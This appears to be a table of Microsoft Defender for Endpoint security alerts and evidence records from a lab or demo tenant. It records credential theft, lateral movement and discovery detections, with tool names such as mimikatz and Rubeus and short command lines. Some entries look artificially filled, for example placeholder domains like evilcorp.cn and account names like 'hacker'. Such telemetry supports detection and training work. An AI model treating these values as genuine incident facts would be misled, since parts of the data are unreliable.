null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T04:51:54.57Z | Suspicious | None | analyst | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037516787046565_654857968 | 200c882a-731d-4992-8bb8-5e7a8278da62 | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:21:18.7046772Z | 2022-11-12T01:35:43.1766667Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:18:30.1154683Z | 2022-11-11T08:18:30.1154683Z | LSASS process memory modified | The Local Security Authority Subsystem Service (LSASS) process enforces security policy by verifying user logons and password changes. Attackers might modify LSASS memory to bypass security mechanisms or circumvent legitimate checks. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | eb025de4-0ad4-4fcb-8ce2-711ee3956107 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003",
"T1003.001",
"T1547.005"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:21:18.7533333Z",
"fileName": null,
"filePath": null,
"ipAddre... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963850335652_-797112414 | 1f117fc9-2eac-4106-b532-d1fc1487bb59 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:59:45.0335888Z | 2022-12-22T09:09:29.2566667Z | 2022-12-22T09:09:29.0872242Z | 2022-12-22T08:22:42.0859019Z | 2022-12-22T08:48:15.2244011Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | Resolved | Medium | 63 | Benign | null | null | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | Automation | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv8-dc.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:05:46.8493187Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "3ad3fb0567038c2ec2e59e76690c2e6c01253af9",
"onboardingStatus": "O... | [
{
"aadUserId": null,
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:59:45.07Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": nul... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T20:43:38.7033333Z | Suspicious | None | darol | internal.corp | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T07:44:14.24Z | Suspicious | None | analyst | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045935112835331_1703441138 | b4f9432b-672b-474a-b166-2355402c25c3 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:11:51.283555Z | 2022-11-21T02:36:06.49Z | null | 2022-11-21T02:07:15.8950101Z | 2022-11-21T02:34:30.3409598Z | Suspicious User Account Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | New | Low | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | null | null | null | [
"T1033",
"T1087",
"T1087.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mda... | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:11:51.33Z",
"fileName": null,
"filePath": null,
"ipAddress":... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T15:41:46.9633333Z | Suspicious | None | darol | prod.env | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:04:30.4666667Z | Suspicious | None | ronhd | vpn.zone | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:14:46.2833333Z | Suspicious | None | root | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:11:52.3166667Z | Malicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | f309b61a8b005b5ce0a3fb58caaa798cfc95f5db | 3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748 | PSEXESVC.exe | C:\Windows | 7,232 | PSEXESVC.exe | 2022-11-21T02:07:15.1389846Z | 680 | 2022-11-10T17:17:06.0160973Z | services.exe | C:\Windows\System32 | Detected | e138ecd8e7b21eaf952cb35d56349bf50c64ac96 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-13T17:35:03.0466667Z | Suspicious | None | darol | lab.net | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T10:44:52.1566667Z | Suspicious | None | darol | staging.net | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T14:56:38.95Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:15:47.8633333Z | Suspicious | None | steve | test.domain | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-21T04:54:51.0633333Z | Suspicious | None | hacker | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1107 | null | steve@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:03:44.9Z | Suspicious | None | operator | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:17:34.2966667Z | Suspicious | None | jeff | evilcorp.cn | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037516160050701_-1034982097 | f4613eda-1468-4739-bb82-0a257ff9afaa | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:20:16.0050966Z | 2022-11-12T01:35:43.1766667Z | 2022-11-12T01:35:42.84Z | 2022-11-11T08:17:06.1238537Z | 2022-11-11T08:17:36.5981924Z | Anomalous account lookups | An anomalous chain of attempts to look up user account information has been observed. An attacker might be gathering information about potential targets. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | ad0494b0-6cfa-4ba2-9285-706fd414acd8 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1033",
"T1069.001",
"T1069.002",
"T1087",
"T1087.001",
"T1087.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:20:16.0633333Z",
"fileName": null,
"filePath": null,
"ipAddre... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:18:39.2366667Z | Suspicious | None | operator | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T16:18:48.2433333Z | Suspicious | None | hacker | null | S-1-12-1-2269820315-1261997569-3294602117-2733835123 | 874ab59b-8e01-4b38-85a3-5fc47303f3a2 | msftadmin@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:59:19.2433333Z | Suspicious | None | jeff | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 6,932 | ipconfig | 2022-12-22T08:47:53.5760604Z | 6,324 | 2022-12-22T08:47:11.8139068Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
da638043450391416859_-2026222797 | 40040bbf-008a-4259-9657-bdd5b687b6a6 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:10:39.1417086Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:04:12.7195838Z | 2022-11-18T05:14:16.2836311Z | PsExec launched a command on a remote device | PsExec was used to launch a command on a remote device. PsExec is a tool used to launch programs on remote, or local devices. An attacker might be leveraging this tool to launch malicious commands to a remote device and move laterally in the organization. | LateralMovement | Resolved | Medium | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 40eca4c4-8854-418a-8024-fff7c9d7b077 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021",
"T1021.002",
"T1569.002"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:10:39.1833333Z",
"fileName": null,
"filePath": null,
"ipAddre... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:16:01.4666667Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:13:00.7233333Z | Suspicious | None | svc_acct | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072963026499465_1469012925 | 8c0c6243-34ce-45ce-a756-bfdc837ffa12 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:58:22.6499651Z | 2022-12-22T08:59:28.19Z | null | 2022-12-22T08:47:29.6780551Z | 2022-12-22T08:47:52.0649455Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | New | Medium | 62 | PendingApproval | null | null | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | null | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "On... | [
{
"aadUserId": null,
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:58:22.77Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": nul... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:18:39.2366667Z | Suspicious | None | ronhd | malicious.io | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:21:09.1466667Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 9a3be34e8316ebb945a4d5818a4066c91fe98c95 | 54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6 | nslookup.exe | C:\Windows\System32 | 4,560 | copy con test.txt | 2022-11-11T08:17:05.938877Z | 6,316 | 2022-11-11T08:17:05.9216438Z | cmd.exe | C:\Windows\System32 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T04:54:24.2666667Z | Suspicious | None | operator | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | 9678ea8069d9812cda2a41c9d3dc32d5c4555b7b | 529ee9d30eef7e331b24e66d68205ab4554b6eb3487193d53ed3a840ca7dde5d | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 14,616 | powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Import-Module 'c:\Users\Takeshi\.vscode\extensions\ms-vscode.powershell-2022.8.5\modules\PowerShellEditorServices\PowerShellEditorServices.psd1'; Start-EditorServices -HostName 'Visual Studio Code Host' -HostProfileId 'Microsoft.VSCode' -HostVersion '2022.8.5' -AdditionalModules @('PowerShellEditorServices.VSCode') -BundledModulesPath 'c:\Users\Takeshi\.vscode\extensions\ms-vscode.powershell-2022.8.5\modules' -EnableConsoleRepl -StartupBanner \"PowerShell Extension v2022.8.5
Copyright (c) Microsoft Corporation.
https://aka.ms/vscode-powershell
Type 'help' to get help.
\" -LogLevel 'Normal' -LogPath 'c:\Users\Takeshi\AppData\Roaming\Code\User\globalStorage\ms-vscode.powershell\logs\1668400572-3c88b720-7963-4dd6-aba1-3456f669fe051668400566006\EditorServices.log' -SessionDetailsPath 'c:\Users\Takeshi\AppData\Roaming\Code\User\globalStorage\ms-vscode.powershell\sessions\PSES-VSCode-11004-905307.json' -FeatureFlags @() " | 2022-11-14T04:36:16.5242809Z | null | null | null | null | Detected | 83b06aa80899050e5d4132992e36b5b8f14b64e9 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:03:39.9733333Z | Malicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-09-30T06:20:01.6733333Z | Unknown | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:22:39.7433333Z | Suspicious | None | steve | internal.corp | S-1-5-21-2300221942-1987151257-321556088-1107 | 0808dea1-2ec8-41d2-8e3e-7c18309fab09 | steve@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:59:44.0733333Z | Suspicious | None | Defender | staging.net | S-1-5-21-2159906967-4174806019-1002223092-500 | null | Defender@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-11T08:28:42.99Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:48:46.11Z | Suspicious | None | user1 | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-22T08:48:46.78Z | Suspicious | None | jeff | test.domain | S-1-5-21-2159906967-4174806019-1002223092-1104 | null | jeff@msdxv8.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T07:44:14.24Z | Suspicious | None | bob | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153088730569_1093802277 | 0cf8fa01-8fbb-4476-a8df-1514deded2ec | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:15:08.8730773Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:10:55.1361741Z | 2022-09-30T06:11:51.5727687Z | Suspicious RDP session | A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives. | SuspiciousActivity | Resolved | High | 20 | TerminatedBySystem | TruePositive | SecurityTesting | WindowsDefenderAtp | e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8 | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1003",
"T1021.001",
"T1555",
"T1558.003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDev... | [
{
"aadUserId": null,
"accountName": "MSDXV2-Win10V$",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:15:08.9233333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCrea... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:04:30.4666667Z | Suspicious | None | ronhd | vpn.zone | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:04:34.4833333Z | Suspicious | Active | ronhd | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | fc870d086c53ded2e94300f7569aa9478186f2c7 | a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1 | Rubeus.exe | C:\Temp | 7,684 | netstat -an | 2022-11-21T02:02:27.8934015Z | 1,972 | 2022-11-21T02:02:27.8509284Z | cmd.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:05:47.19Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 6cbce4a295c163791b60fc23d285e6d84f28ee4c | de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | 11,616 | type secret.txt | 2022-11-21T02:01:44.3957302Z | 7,452 | 2022-11-21T02:01:44.2419747Z | null | null | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T04:44:35.99Z | Suspicious | None | analyst | TMTOWER-BOOK | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043451254856130_207704893 | c9964f76-de47-435b-9cb1-496689dcb261 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:12:05.4856454Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:09:32.0366644Z | 2022-11-18T05:14:15.9918082Z | File dropped and launched from remote location | A remote session dropped a file and executed it. An attacker or a malware might be an attempting move laterally or propagate. | LateralMovement | Resolved | Medium | 49 | PendingApproval | TruePositive | SecurityTesting | WindowsDefenderAtp | 17d50613-c135-4981-858e-86cdecb4e46e | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1021.002",
"T1105",
"T1570"
] | [
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "lab.net",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
... | [
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:12:05.5433333Z",
"fileName": null,
"filePath": null,
"ipAddress": nul... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072957493221662_648641683 | a575be64-afce-415c-bfc3-dfbb3d043215 | 975 | MicrosoftDefenderForEndpoint | 2022-12-22T08:49:09.3221869Z | 2022-12-22T08:49:09.84Z | null | 2022-12-22T08:47:53.413688Z | 2022-12-22T08:47:53.413688Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | null | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Inactive",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpD... | [
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:49:09.35Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001153478263331_1923660258 | 3f59e913-48a2-4e8c-837e-3b5a8951c8dd | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:15:47.8263543Z | 2022-11-19T01:35:42.7033333Z | 2022-09-30T06:28:49.0616809Z | 2022-09-30T06:13:44.605477Z | 2022-09-30T06:13:44.605477Z | SID history injection | A Security IDentifcation (SID) history injection was detected on this device. SID history is an attribute that supports migration scenarios. Attackers typically use attack tools to change the SID history of an existing domain user to an SID with elevated privileges. With elevated privileges, the affected process might be able to access sensitive files, ensure persistence, and modify system settings. | PrivilegeEscalation | Resolved | Medium | 24 | Benign | TruePositive | SecurityTesting | WindowsDefenderAtp | f9448527-19db-4a4d-90e7-e9279c3e77b9 | msftadmin@msdxv2.m365dpoc.com | Barium | null | [
"T1134.005"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "defender",
"domainName": "MSDXV2"
},
{
... | [
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:15:47.8633333Z",
"fileName": null,
"filePath": null,
"ipAddr... | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
